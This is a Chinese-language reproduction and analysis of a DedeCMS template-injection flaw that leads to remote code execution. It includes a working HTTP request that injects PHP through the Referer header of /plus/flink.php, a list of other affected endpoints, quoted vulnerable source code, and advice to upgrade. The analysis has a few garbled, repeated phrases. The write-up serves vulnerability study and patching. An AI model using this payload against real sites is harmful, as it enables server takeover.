漏洞類型
SSTI RCE
利用條件
影響范圍應用
漏洞概述
2021年9月30日,國外安全研究人員Steven Seeley披露了最新的DedeCMS版本中存在的一處SQL注入漏洞以及一處SSTI導致的RCE漏洞,由于SQL注入漏洞利用條件極為苛刻,故這里只對該SSTI注入漏洞進行簡要分析復現
漏環境搭建
【技術學習資料】
漏洞復現
這里使用phpstudy來搭建環境
網站前臺:http://192.168.59.1/index.php?upcache=1
網站后臺: http://192.168.59.1/dede/login.php?gotopa...
漏洞利用
- GET /plus/flink.php?dopost=save HTTP/1.1Host: 192.168.59.1Referer: <?php "system"(whoami);die;/*Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=rh4vs9n0m1ihpuguuok4oinerr; _csrf_name_26859a31=736abb4d994bae3b85bba1781e8a50f9; _csrf_name_26859a31__ckMd5=0f32d9d2b18e1390Connection: close
類似的URL還有:
- /plus/flink.php?dopost=save/plus/users_products.php?oid=1337 /plus/download.php?aid=1337/plus/showphoto.php?aid=1337/plus/users-do.php?fmdo=sendMail/plus/posttocar.php?id=1337/plus/recommend.php
漏洞分析
漏洞入口位于plus/flink.php文件中,在該文件中如果我們傳入的dopost值為save且未傳遞驗證碼時,緊接著會去調用ShowMsg函數:
之后跟蹤進入到include/common.func.php文件中的ShowMsg()函數內
- /** * 短消息函數,可以在某個動作處理后友好的提示信息 * * @param string $msg 消息提示信息 * @param string $gourl 跳轉地址 * @param int $onlymsg 僅顯示信息 * @param int $limittime 限制時間 * @return void */function ShowMsg($msg, $gourl, $onlymsg = 0, $limittime = 0){ if (empty($GLOBALS['cfg_plus_dir'])) { $GLOBALS['cfg_plus_dir'] = '..'; } if ($gourl == -1) { $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; if ($gourl == "") { $gourl = -1; } } $htmlhead = " <html>\r\n<head>\r\n<title>DedeCMS提示信息</title>\r\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset={dede:global.cfg_soft_lang/}\" /> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\"> <meta name=\"renderer\" content=\"webkit\"> <meta http-equiv=\"Cache-Control\" content=\"no-siteapp\" /> <link rel=\"stylesheet\" type=\"text/css\" href=\"{dede:global.cfg_assets_dir/}/pkg/uikit/css/uikit.min.css\" /> <link rel=\"stylesheet\" type=\"text/css\" href=\"{dede:global.cfg_assets_dir/}/css/manage.dede.css\"> <base target='_self'/> </head> <body> " . (isset($GLOBALS['ucsynlogin']) ? $GLOBALS['ucsynlogin'] : '') . " <center style=\"width:450px\" class=\"uk-container\"> <div class=\"uk-card uk-card-small uk-card-default\" style=\"margin-top: 50px;\"> <div class=\"uk-card-header\" style=\"height:20px\">DedeCMS 提示信息!</div> <script>\r\n"; $htmlfoot = " </script> </center> <script src=\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit.min.js\"></script> <script src=\"{dede:global.cfg_assets_dir/}/pkg/uikit/js/uikit-icons.min.js\"></script> </body>\r\n</html>\r\n"; $litime = ($limittime == 0 ? 1000 : $limittime); $func = ''; if ($gourl == '-1') { if ($limittime == 0) { $litime = 3000; } $gourl = "javascript:history.go(-1);"; } if ($gourl == '' || $onlymsg == 1) { $msg = "<script>alert(\"" . str_replace("\"", "“", $msg) . "\");</script>"; } else { //當網址為:close::objname 時, 關閉父框架的id=objname元素 if (preg_match('/close::/', $gourl)) { $tgobj = trim(preg_replace('/close::/', '', $gourl)); $gourl = 'javascript:;'; $func .= "window.parent.document.getElementById('{$tgobj}').style.display='none';\r\n"; } $func .= "var pgo=0; function JumpUrl(){ if(pgo==0){ location='$gourl'; pgo=1; } }\r\n"; $rmsg = $func; $rmsg .= "document.write(\"<div style='height:130px;font-size:10pt;background:#ffffff'><br />\");\r\n"; $rmsg .= "document.write(\"" . str_replace("\"", "“", $msg) . "\");\r\n"; $rmsg .= "document.write(\""; if ($onlymsg == 0) { if ($gourl != 'javascript:;' && $gourl != '') { $rmsg .= "<br /><a href='{$gourl}'>如果你的瀏覽器沒反應,請點擊這里...</a>"; $rmsg .= "<br/></div>\");\r\n"; $rmsg .= "setTimeout('JumpUrl()',$litime);"; } else { $rmsg .= "<br/></div>\");\r\n"; } } else { $rmsg .= "<br/><br/></div>\");\r\n"; } $msg = $htmlhead . $rmsg . $htmlfoot; } $tpl = new DedeTemplate(); $tpl->LoadString($msg); $tpl->Display();}
在這里我們可以看到如果gourl被設置為?1(間接可控),則攻擊者可以通過HTTPREFERER控制gourl被設置為?1(間接可控),則攻擊者可以通過HTTPREFERER控制gourl處變量的值,而該變量未經過濾直接賦值給變量gourl,之后經過一系列的操作之后將gourl,之后經過一系列的操作之后將gourl與html代碼拼接處理后轉而調用tpl?>LoadString進行頁面渲染操作,之后跟進LoadString可以看到此處的sourceString變量直接由tpl?>LoadString進行頁面渲染操作,之后跟進LoadString可以看到此處的sourceString變量直接由str賦值過來,該變量攻擊者可控,之后將其進行一次md5計算,然后設置緩存文件和緩存配置文件名,緩存文件位于data\tplcache目錄,之后調用ParserTemplate對文件進行解析:
ParserTemplate如下:
- /** * 解析模板 * * @access public * @return void */ public function ParseTemplate() { if ($this->makeLoop > 5) { return; } $this->count = -1; $this->cTags = array(); $this->isParse = true; $sPos = 0; $ePos = 0; $tagStartWord = $this->tagStartWord; $fullTagEndWord = $this->fullTagEndWord; $sTagEndWord = $this->sTagEndWord; $tagEndWord = $this->tagEndWord; $startWordLen = strlen($tagStartWord); $sourceLen = strlen($this->sourceString); if ($sourceLen <= ($startWordLen + 3)) { return; } $cAtt = new TagAttributeParse(); $cAtt->CharToLow = true; //遍歷模板字符串,請取標記及其屬性信息 $t = 0; $preTag = ''; $tswLen = strlen($tagStartWord); @$cAtt->cAttributes->items = array(); for ($i = 0; $i < $sourceLen; $i++) { $ttagName = ''; //如果不進行此判斷,將無法識別相連的兩個標記 if ($i - 1 >= 0) { $ss = $i - 1; } else { $ss = 0; } $tagPos = strpos($this->sourceString, $tagStartWord, $ss); //判斷后面是否還有模板標記 if ($tagPos == 0 && ($sourceLen - $i < $tswLen || substr($this->sourceString, $i, $tswLen) != $tagStartWord) ) { $tagPos = -1; break; } //獲取TAG基本信息 for ($j = $tagPos + $startWordLen; $j < $tagPos + $startWordLen + $this->tagMaxLen; $j++) { if (preg_match("/[ >\/\r\n\t\}\.]/", $this->sourceString[$j])) { break; } else { $ttagName .= $this->sourceString[$j]; } } if ($ttagName != '') { $i = $tagPos + $startWordLen; $endPos = -1; //判斷 '/}' '{tag:下一標記開始' '{/tag:標記結束' 誰最靠近 $fullTagEndWordThis = $fullTagEndWord . $ttagName . $tagEndWord; $e1 = strpos($this->sourceString, $sTagEndWord, $i); $e2 = strpos($this->sourceString, $tagStartWord, $i); $e3 = strpos($this->sourceString, $fullTagEndWordThis, $i); $e1 = trim($e1); $e2 = trim($e2); $e3 = trim($e3); $e1 = ($e1 == '' ? '-1' : $e1); $e2 = ($e2 == '' ? '-1' : $e2); $e3 = ($e3 == '' ? '-1' : $e3); if ($e3 == -1) { //不存在'{/tag:標記' $endPos = $e1; $elen = $endPos + strlen($sTagEndWord); } else if ($e1 == -1) { //不存在 '/}' $endPos = $e3; $elen = $endPos + strlen($fullTagEndWordThis); } //同時存在 '/}' 和 '{/tag:標記' else { //如果 '/}' 比 '{tag:'、'{/tag:標記' 都要靠近,則認為結束標志是 '/}',否則結束標志為 '{/tag:標記' if ($e1 < $e2 && $e1 < $e3) { $endPos = $e1; $elen = $endPos + strlen($sTagEndWord); } else { $endPos = $e3; $elen = $endPos + strlen($fullTagEndWordThis); } } //如果找不到結束標記,則認為這個標記存在錯誤 if ($endPos == -1) { echo "Tpl Character postion $tagPos, '$ttagName' Error!<br />\r\n"; break; } $i = $elen; //分析所找到的標記位置等信息 $attStr = ''; $innerText = ''; $startInner = 0; for ($j = $tagPos + $startWordLen; $j < $endPos; $j++) { if ($startInner == 0) { if ($this->sourceString[$j] == $tagEndWord) { $startInner = 1; continue; } else { $attStr .= $this->sourceString[$j]; } } else { $innerText .= $this->sourceString[$j]; } } $ttagName = strtolower($ttagName); //if、php標記,把整個屬性串視為屬性 if (preg_match("/^if[0-9]{0,}$/", $ttagName)) { $cAtt->cAttributes = new TagAttribute(); $cAtt->cAttributes->count = 2; $cAtt->cAttributes->items['tagname'] = $ttagName; $cAtt->cAttributes->items['condition'] = preg_replace("/^if[0-9]{0,}[\r\n\t ]/", "", $attStr); $innerText = preg_replace("/\{else\}/i", '<' . "?php\r\n}\r\nelse{\r\n" . '?' . '>', $innerText); } else if ($ttagName == 'php') { $cAtt->cAttributes = new TagAttribute(); $cAtt->cAttributes->count = 2; $cAtt->cAttributes->items['tagname'] = $ttagName; $cAtt->cAttributes->items['code'] = '<' . "?php\r\n" . trim( preg_replace( "/^php[0-9]{0,}[\r\n\t ]/", "", $attStr ) ) . "\r\n?" . '>'; } else { //普通標記,解釋屬性 $cAtt->SetSource($attStr); } $this->count++; $cTag = new Tag(); $cTag->tagName = $ttagName; $cTag->startPos = $tagPos; $cTag->endPos = $i; $cTag->cAtt = $cAtt->cAttributes; $cTag->isCompiler = false; $cTag->tagID = $this->count; $cTag->innerText = $innerText; $this->cTags[$this->count] = $cTag; } else { $i = $tagPos + $startWordLen; break; } } //結束遍歷模板字符串 if ($this->count > -1 && $this->isCompiler) { $this->CompilerAll(); } }
之后返回上一級,在這里會緊接著調用Display函數對解析結果進行展示,在這里會調用WriteCache函數
在WriteCache函數中寫入緩存文件:
在這里使用GetResult返回值sourceString來設置$result變量,該變量包含攻擊者控制的輸入數據:
之后調用CheckDisabledFunctions函數進行檢查操作,該函數主要用于檢查是否存在被禁止的函數,然后通過token_get_all_nl函數獲取輸入,然而處理時并沒有過濾雙引號,存在被繞過的風險,攻擊者可以通過將惡意PHP寫到臨時文件,之后在Display函數處通過include $tpl->CacheFile()將惡意臨時文件包含進來從而實現遠程代碼執行:
安全建議
目前官方已發布最新版本:DedeCMS V5.7.80 UTF-8正式版,建議升級到該版本
